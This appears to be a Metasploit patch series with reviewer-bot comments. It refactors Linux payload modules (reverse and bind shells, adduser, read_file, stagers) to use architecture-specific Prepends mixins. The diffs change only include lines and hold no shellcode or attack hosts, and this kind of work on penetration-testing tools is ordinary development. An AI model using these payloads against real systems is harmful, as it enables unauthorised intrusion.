diff --git a/modules/payloads/singles/linux/mipsle/reboot.rb b/modules/payloads/singles/linux/mipsle/reboot.rb
index 84172e73353a..e533f15f66f7 100644
--- a/modules/payloads/singles/linux/mipsle/reboot.rb
+++ b/modules/payloads/singles/linux/mipsle/reboot.rb
@@ -8,7 +8,6 @@ module MetasploitModule
   CachedSize = 32
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
index 8850fe020c22..5c411a555618 100644
--- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
@@ -9,7 +9,6 @@ module MetasploitModule
   CachedSize = 232
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
index 4ec88cb4e18e..a4c4d105e8eb 100644
--- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
@@ -9,7 +9,6 @@ module MetasploitModule
   CachedSize = 184
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb
index 7f52841110c3..ccc84496b282 100644
--- a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 223
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::Ppc::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/ppc64/shell_find_port.rb b/modules/payloads/singles/linux/ppc64/shell_find_port.rb
index d1e046e40c8f..ed1926b7122c 100644
--- a/modules/payloads/singles/linux/ppc64/shell_find_port.rb
+++ b/modules/payloads/singles/linux/ppc64/shell_find_port.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 171
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::Ppc::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb
index 6b66f8280349..1a22c6d8ff72 100644
--- a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 183
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::Ppc::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/riscv32le/exec.rb b/modules/payloads/singles/linux/riscv32le/exec.rb
index 59e903ef3b62..922540cf0918 100644
--- a/modules/payloads/singles/linux/riscv32le/exec.rb
+++ b/modules/payloads/singles/linux/riscv32le/exec.rb
@@ -7,7 +7,6 @@ module MetasploitModule
   CachedSize = 96
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   def initialize(info = {})
     super(
diff --git a/modules/payloads/singles/linux/riscv32le/reboot.rb b/modules/payloads/singles/linux/riscv32le/reboot.rb
index 7cd0d94cea61..c3161b3d48c3 100644
--- a/modules/payloads/singles/linux/riscv32le/reboot.rb
+++ b/modules/payloads/singles/linux/riscv32le/reboot.rb
@@ -7,7 +7,6 @@ module MetasploitModule
   CachedSize = 32
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   def initialize(info = {})
     super(
diff --git a/modules/payloads/singles/linux/riscv64le/exec.rb b/modules/payloads/singles/linux/riscv64le/exec.rb
index 7f04eb77820f..9600bb35d27d 100644
--- a/modules/payloads/singles/linux/riscv64le/exec.rb
+++ b/modules/payloads/singles/linux/riscv64le/exec.rb
@@ -7,7 +7,6 @@ module MetasploitModule
   CachedSize = 100
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   def initialize(info = {})
     super(
diff --git a/modules/payloads/singles/linux/riscv64le/reboot.rb b/modules/payloads/singles/linux/riscv64le/reboot.rb
index bd213cb43718..87278a1db75d 100644
--- a/modules/payloads/singles/linux/riscv64le/reboot.rb
+++ b/modules/payloads/singles/linux/riscv64le/reboot.rb
@@ -7,7 +7,6 @@ module MetasploitModule
   CachedSize = 40
   include Msf::Payload::Single
-  include Msf::Payload::Linux
   def initialize(info = {})
     super(
diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb
index 8475354988d1..c2e6aaf35754 100644
--- a/modules/payloads/singles/linux/x64/exec.rb
+++ b/modules/payloads/singles/linux/x64/exec.rb
@@ -8,7 +8,7 @@ module MetasploitModule
   CachedSize = 44
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb b/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb
index 6e9d6fe376c4..6a0847bb720d 100644
--- a/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb
+++ b/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 109
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends
   include Msf::Payload::Single
   include Msf::Payload::Pingback
   include Msf::Payload::Pingback::Options
diff --git a/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb b/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb
index 4ff1b6a6115d..156d84339c31 100644
--- a/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 125
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends
   include Msf::Payload::Single
   include Msf::Payload::Pingback
   include Msf::Payload::Pingback::Options
diff --git a/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb
index 1f53da6a4728..6084a29688d1 100644
--- a/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 94
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb
index b71f3190561c..d126b9d64f64 100644
--- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 86
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
index 5b5945d25ee9..9bd89bf13c81 100644
--- a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
+++ b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
@@ -8,7 +8,7 @@ module MetasploitModule
   CachedSize = 51
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb
index 5e2cab58b8d3..1c10fcd40793 100644
--- a/modules/payloads/singles/linux/x64/shell_find_port.rb
+++ b/modules/payloads/singles/linux/x64/shell_find_port.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 98
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb
index 6b67d8b8f628..4ec7fc1faba7 100644
--- a/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 90
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
index a96fd8fceb0b..3e697fe14f13 100644
--- a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 74
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb
index 0a730f65e584..387791ea89cf 100644
--- a/modules/payloads/singles/linux/x86/adduser.rb
+++ b/modules/payloads/singles/linux/x86/adduser.rb
@@ -16,7 +16,7 @@ module MetasploitModule
   CachedSize = 97
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/singles/linux/x86/chmod.rb b/modules/payloads/singles/linux/x86/chmod.rb
index d06c51f9a6c6..d301259cd206 100644
--- a/modules/payloads/singles/linux/x86/chmod.rb
+++ b/modules/payloads/singles/linux/x86/chmod.rb
@@ -13,7 +13,7 @@ module MetasploitModule
   CachedSize = 36
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb
index bb3b98101506..41146a514d1c 100644
--- a/modules/payloads/singles/linux/x86/exec.rb
+++ b/modules/payloads/singles/linux/x86/exec.rb
@@ -16,7 +16,7 @@ module MetasploitModule
   CachedSize = 43
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb
index 538b2d812aab..cd4a244c231c 100644
--- a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb
+++ b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb
@@ -8,7 +8,7 @@ module MetasploitModule
   CachedSize = 0
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb
index 2883ea6f0b50..0f2bbad4bd0f 100644
--- a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb
@@ -8,7 +8,7 @@ module MetasploitModule
   CachedSize = 0
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/read_file.rb b/modules/payloads/singles/linux/x86/read_file.rb
index 2686edce622e..cec49aa4cbd7 100644
--- a/modules/payloads/singles/linux/x86/read_file.rb
+++ b/modules/payloads/singles/linux/x86/read_file.rb
@@ -8,7 +8,7 @@ module MetasploitModule
   CachedSize = 63
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb
index 2f374d73f331..ca7423e91375 100644
--- a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb
+++ b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 90
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb
index f1e8d10b4b0f..bb2fee56d1e7 100644
--- a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 78
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb
index c5fa747e8697..ec6ef21d8543 100644
--- a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb
+++ b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb
@@ -8,7 +8,7 @@ module MetasploitModule
   CachedSize = 57
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/singles/linux/x86/shell_find_port.rb b/modules/payloads/singles/linux/x86/shell_find_port.rb
index 9ad0de71274e..9e5b55040866 100644
--- a/modules/payloads/singles/linux/x86/shell_find_port.rb
+++ b/modules/payloads/singles/linux/x86/shell_find_port.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 62
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/x86/shell_find_tag.rb b/modules/payloads/singles/linux/x86/shell_find_tag.rb
index dfa9b6ab5d1a..98afa53bbd65 100644
--- a/modules/payloads/singles/linux/x86/shell_find_tag.rb
+++ b/modules/payloads/singles/linux/x86/shell_find_tag.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 69
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb
index 92a4c2d98e2d..643b4079a9c9 100644
--- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 68
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb
index 7ca09731f7c0..a5dd99d5420b 100644
--- a/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb
+++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb
@@ -10,7 +10,7 @@ module MetasploitModule
   CachedSize = 158
   include Msf::Payload::Single
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
index 59ec4456055b..d1cdca6aa46e 100644
--- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
@@ -17,6 +17,7 @@ module MetasploitModule
   CachedSize = 212
+  include Msf::Payload::Linux::Aarch64::Prepends
   include Msf::Payload::Stager
   def initialize(info = {})
diff --git a/modules/payloads/stagers/linux/armle/bind_tcp.rb b/modules/payloads/stagers/linux/armle/bind_tcp.rb
index 22be72c1c8eb..8078e333abb2 100644
--- a/modules/payloads/stagers/linux/armle/bind_tcp.rb
+++ b/modules/payloads/stagers/linux/armle/bind_tcp.rb
@@ -16,6 +16,7 @@ module MetasploitModule
   CachedSize = 232
+  include Msf::Payload::Linux::Armle::Prepends
   include Msf::Payload::Stager
   def initialize(info = {})
diff --git a/modules/payloads/stagers/linux/armle/reverse_tcp.rb b/modules/payloads/stagers/linux/armle/reverse_tcp.rb
index af064b8e7eb1..d466845ca769 100644
--- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb
@@ -16,6 +16,7 @@ module MetasploitModule
   CachedSize = 260
+  include Msf::Payload::Linux::Armle::Prepends
   include Msf::Payload::Stager
   def initialize(info = {})
diff --git a/modules/payloads/stagers/linux/x64/bind_tcp.rb b/modules/payloads/stagers/linux/x64/bind_tcp.rb
index f66fdad158ff..0a29e655fbcc 100644
--- a/modules/payloads/stagers/linux/x64/bind_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/bind_tcp.rb
@@ -9,7 +9,7 @@ module MetasploitModule
   CachedSize = 78
   include Msf::Payload::Stager
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb
index 33a9a5d4b9b3..aa331cadd199 100644
--- a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb
@@ -17,7 +17,7 @@ module MetasploitModule
   CachedSize = 63
   include Msf::Payload::Stager
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   def self.handler_type_alias
     "bind_nonx_tcp"
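Review bot: The aarch64 stager now does `include Msf::Payload::Linux::Aarch64::Prepends`, but no `aarch64/prepends.rb` is among the files patch 01 creates (only armle, ppc, x64, x86 and the base `linux/prepends.rb`) and patches 02–09 are not visible here; if none of them defines that constant, the module raises NameError at load. Worth confirming the mixin exists and that it includes the base `Msf::Payload::Linux::Prepends`, since patch 12 shows the x86 mixin shipped without that include. Separately, this hunk and the two armle stager hunks put the Prepends include before `include Msf::Payload::Stager`, while stagers/linux/x64/bind_tcp.rb and the x86 stagers put it after; if both mixins define `initialize`, the include order decides which runs first, so one consistent order across the stagers would avoid surprises.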
diff --git a/modules/payloads/stagers/linux/x86/find_tag.rb b/modules/payloads/stagers/linux/x86/find_tag.rb
index 84172bc5f372..565a24661fcf 100644
--- a/modules/payloads/stagers/linux/x86/find_tag.rb
+++ b/modules/payloads/stagers/linux/x86/find_tag.rb
@@ -17,7 +17,7 @@ module MetasploitModule
   CachedSize = 37
   include Msf::Payload::Stager
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb
index 07eb8003b995..c98fe8085204 100644
--- a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb
@@ -10,7 +10,7 @@ module MetasploitModule
   CachedSize = 77
   include Msf::Payload::Stager
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   def self.handler_type_alias
     "reverse_ipv6_tcp"
diff --git a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb
index ba4c5da8ef71..1d9be6f67610 100644
--- a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb
@@ -17,7 +17,7 @@ module MetasploitModule
   CachedSize = 50
   include Msf::Payload::Stager
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   def self.handler_type_alias
     "reverse_nonx_tcp"
diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb
index 3fd72f8df846..773ece7bbf23 100644
--- a/modules/payloads/stages/linux/x64/shell.rb
+++ b/modules/payloads/stages/linux/x64/shell.rb
@@ -5,7 +5,7 @@
 module MetasploitModule
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X64::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb
index d6bec2b16cea..bc399417bec8 100644
--- a/modules/payloads/stages/linux/x86/shell.rb
+++ b/modules/payloads/stages/linux/x86/shell.rb
@@ -5,7 +5,7 @@
 module MetasploitModule
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::X86::Prepends
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
From e39af38c73e0728fabdbf38ca49ea35220e6c289 Mon Sep 17 00:00:00 2001
From: dledda-r7
Date: Wed, 15 Jan 2025 04:31:53 -0500
Subject: [PATCH 11/12] fix(payloads): updating prepend mixin in payloads
---
 modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb | 1 -
 modules/payloads/stagers/linux/mipsle/reverse_tcp.rb | 1 -
 modules/payloads/stages/linux/mipsbe/shell.rb | 1 -
 modules/payloads/stages/linux/mipsle/shell.rb | 1 -
 4 files changed, 4 deletions(-)
diff --git a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
index 4889905b28b5..d17105565e71 100644
--- a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
@@ -9,7 +9,6 @@ module MetasploitModule
   CachedSize = 272
   include Msf::Payload::Stager
-  include Msf::Payload::Linux
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
index eaae2ddad28f..a5062ce6a573 100644
--- a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
@@ -9,7 +9,6 @@ module MetasploitModule
   CachedSize = 272
   include Msf::Payload::Stager
-  include Msf::Payload::Linux
   def initialize(info = {})
     super(merge_info(info,
diff --git a/modules/payloads/stages/linux/mipsbe/shell.rb b/modules/payloads/stages/linux/mipsbe/shell.rb
index d8a7695fe137..e8b2e7641c4e 100644
--- a/modules/payloads/stages/linux/mipsbe/shell.rb
+++ b/modules/payloads/stages/linux/mipsbe/shell.rb
@@ -4,7 +4,6 @@
 ##
 module MetasploitModule
-  include Msf::Payload::Linux
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
diff --git a/modules/payloads/stages/linux/mipsle/shell.rb b/modules/payloads/stages/linux/mipsle/shell.rb
index 0d96e44c4da9..bb2b4643fe3e 100644
--- a/modules/payloads/stages/linux/mipsle/shell.rb
+++ b/modules/payloads/stages/linux/mipsle/shell.rb
@@ -5,7 +5,6 @@
 module MetasploitModule
-  include Msf::Payload::Linux
   include Msf::Sessions::CommandShellOptions
   def initialize(info = {})
From 763ff9275eccee6feeebfed70eb5208faf07a523 Mon Sep 17 00:00:00 2001
From: dledda-r7
Date: Fri, 17 Jan 2025 02:04:13 -0500
Subject: [PATCH 12/12] fix(payloads): fix x86 prepends
---
 lib/msf/core/payload/linux/x86/prepends.rb | 1 +
 1 file changed, 1 insertion(+)
diff --git a/lib/msf/core/payload/linux/x86/prepends.rb b/lib/msf/core/payload/linux/x86/prepends.rb
index 2802967d63d5..27462e9626c4 100644
--- a/lib/msf/core/payload/linux/x86/prepends.rb
+++ b/lib/msf/core/payload/linux/x86/prepends.rb
@@ -2,6 +2,7 @@
 # Linux x86 prepends
 #
 module Msf::Payload::Linux::X86::Prepends
+  include Msf::Payload::Linux::Prepends
   def prepends_order
     %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid PrependChrootBreak]
   end
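Review bot: The missing `include Msf::Payload::Linux::Prepends` in `Msf::Payload::Linux::X86::Prepends` only surfaced as a follow-up fix at the end of the series, which suggests nothing in the test suite exercises option registration for the arch-specific mixins; the Armle, Ppc and X64 mixins are not visible in this hunk and could carry the same omission. A spec that instantiates one payload per Linux architecture and asserts that the `PrependSetuid` and `AppendExit` advanced options are registered, and that `prepends_order` returns a non-empty list, would catch this class of regression. `prepends_order` lists the Prepend* options but not `AppendExit`; if the base mixin applies the exit stub separately that is fine, otherwise a one-line comment, `# AppendExit is handled by the base mixin after the prepends`, would document why it is absent here.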